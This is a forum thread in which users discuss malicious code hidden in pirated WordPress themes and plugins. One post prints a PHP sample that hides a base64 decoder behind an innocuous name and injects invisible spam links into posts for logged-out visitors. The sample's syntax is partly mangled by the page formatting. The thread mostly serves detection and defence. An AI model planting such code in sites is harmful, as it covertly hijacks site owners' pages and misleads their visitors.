Best Blackhat Forum

Best Blackhat Forum > Freebies > Software, Scripts, Plug-ins, Tools and Bots > PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
Full Version: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2

Lumos

04-22-2019, 02:02 PM
Bad stuff !!
Why don't the AVs pick up on it;
Or...
Why isn't there a scanner for this sort of thing for those of us who aren't sure of what to look for in supposedly 'nulled' things ??
Thanks

jazz1611

04-22-2019, 02:58 PM
PHP Code:
<?php

/**
 * Helper function for translation.
 */

if (!function_exists('sanitize_context_zero')) {
    function sanitize_context_zero($input) {
        $keyStr "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
        $chr1 $chr2 $chr3 "";
        $enc1 $enc2 $enc3 $enc4 "";
        $i 0;
        $output "";
        $input preg_replace("[^A-Za-z0-9\+\/\=]"""$input);
        do {
            $enc1 strpos($keyStrsubstr($input$i++, 1));
            $enc2 strpos($keyStrsubstr($input$i++, 1));
            $enc3 strpos($keyStrsubstr($input$i++, 1));
            $enc4 strpos($keyStrsubstr($input$i++, 1));
            $chr1 = ($enc1 << 2) | ($enc2 >> 4);
            $chr2 = (($enc2 and 15) << 4) | ($enc3 >> 2);
            $chr3 = (($enc3 and 3) << 6) | $enc4;
            $output $output chr((int)$chr1);
            if ($enc3 != 64) {
                $output $output chr((int)$chr2);
            }

            if ($enc4 != 64) {
                $output $output chr((int)$chr3);
            }

            $chr1 $chr2 $chr3 "";
            $enc1 $enc2 $enc3 $enc4 "";
        }

        while ($i strlen($input));
        return urldecode($output);
    }
}

if ( ! function_exists('safemodecc') ) {
    
    function safemodecc$content ) {

        if ( is_single() and& ! is_user_logged_in() and& ! is_feed() and& ! stristr$_SERVER['REQUEST_URI'], "amp") ) {

            $divclass sanitize_context_zero("<div style="position:absolutetop:0left:-9999px;">");
            $array = Array(
                    sanitize_context_zero("Free Download WordPress Themes"),
                    sanitize_context_zero("Download Premium WordPress Themes Free"),
                    sanitize_context_zero("Download WordPress Themes"),
                    sanitize_context_zero("Download WordPress Themes Free"),
                    sanitize_context_zero("Download Nulled WordPress Themes"),
                    sanitize_context_zero("Download Best WordPress Themes Free Download"),
                    sanitize_context_zero("Premium WordPress Themes Download")
            );
            $array2 = Array(
                    sanitize_context_zero("free download udemy paid course"),
                    sanitize_context_zero("udemy paid course free download"),
                    sanitize_context_zero("download udemy paid course for free"),
                    sanitize_context_zero("free download udemy course"),
                    sanitize_context_zero("udemy course download free"),
                    sanitize_context_zero("online free course"),
                    sanitize_context_zero("free online course"),
                    sanitize_context_zero("download lynda course free"),
                    sanitize_context_zero("lynda course free download"),
                    sanitize_context_zero("udemy free download")
            );
            $array3 = Array(
                    sanitize_context_zero("download mobile firmware"),
                    sanitize_context_zero("download samsung firmware"),
                    sanitize_context_zero("download micromax firmware"),
                    sanitize_context_zero("download intex firmware"),
                    sanitize_context_zero("download redmi firmware"),
                    sanitize_context_zero("download xiomi firmware"),
                    sanitize_context_zero("download lenevo firmware"),
                    sanitize_context_zero("download lava firmware"),
                    sanitize_context_zero("download karbonn firmware"),
                    sanitize_context_zero("download coolpad firmware"),
                    sanitize_context_zero("download huawei firmware")
            );

            $abc1 '' $divclass '<a href="'.sanitize_context_zero("https://www.thewpclub.net").'">' $array[array_rand($array) ] . '</a></div>';
            $abc2 '' $divclass '<a href="'.sanitize_context_zero("https://www.themeslide.com").'">' $array[array_rand($array) ] . '</a></div>';
            $abc3 '' $divclass '<a href="'.sanitize_context_zero("https://www.script-stack.com").'">' $array[array_rand($array) ] . '</a></div>';
            $abc4 '' $divclass '<a href="'.sanitize_context_zero("https://www.thememazing.com").'">' $array[array_rand($array) ] . '</a></div>';
            $abc5 '' $divclass '<a href="'.sanitize_context_zero("https://www.onlinefreecourse.net").'">' $array2[array_rand($array2) ] . '</a></div>';
            $abc6 '' $divclass '<a href="'.sanitize_context_zero("https://www.frendx.com/firmware/").'">' $array3[array_rand($array3) ] . '</a></div>';
            $abc7 '' $divclass '<a href="'.sanitize_context_zero("https://www.themebanks.com").'">' $array[array_rand($array) ] . '</a></div>';
            $abc8 '' $divclass '<a href="'.sanitize_context_zero("https://downloadtutorials.net").'">' $array2[array_rand($array2) ] . '</a></div>';

            $fullcontent $content.$abc1.$abc2.$abc3.$abc4.$abc5.$abc6.$abc7.$abc8;

        } else {
        
            $fullcontent $content;

        }

        return $fullcontent;

    }
}
    [/code]
if ( ! has_filter'the_content''safemodecc' ) ) {
    add_filter('the_content''safemodecc');

Massblack

04-22-2019, 03:17 PM
I had a plugin installed for a year with no issues then one day it activated and google banned my shared server account based on one website. Reason enough for me.....
MassBlack

xiaofang

04-24-2019, 11:16 PM
Maybe some of this is good to use and check with
https://www.hongkiat.com/blog/wordpress-...ous-codes/


Normalized URL: http://bestblackhatforum.com:80
Submission date: Wed Apr 24 13:18:37 2019
Server IP address: 104.18.48.93
Country: United States
Server: cloudflare
Malicious files: 0
Suspicious files: 0
Potentially Suspicious files: 0
Clean files: 94
External links detected: 290
Iframes scanned: 0
Blacklisted: No

Lumos

04-25-2019, 11:17 AM
Interesting addition by Xiaofang - Thanks
Attached is that site's page as a short PDF with all the excess blogging adverts, etc. removed.

Perhaps it will help some folks to better secure their WP sites.

Source from above reply:
Code:
https://www.hongkiat.com/blog/wordpress-plugins-detect-malicious-codes/

tompk242

05-15-2019, 01:26 PM
Just update the url and decode site at 1st post

ruanjiandiguo

05-24-2019, 06:30 PM
thanks man. Just added this site https://www.thewpclub.net/ into my block list.
Pages: 1 2
Best Blackhat Forum > Freebies > Software, Scripts, Plug-ins, Tools and Bots > PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
Reference URL's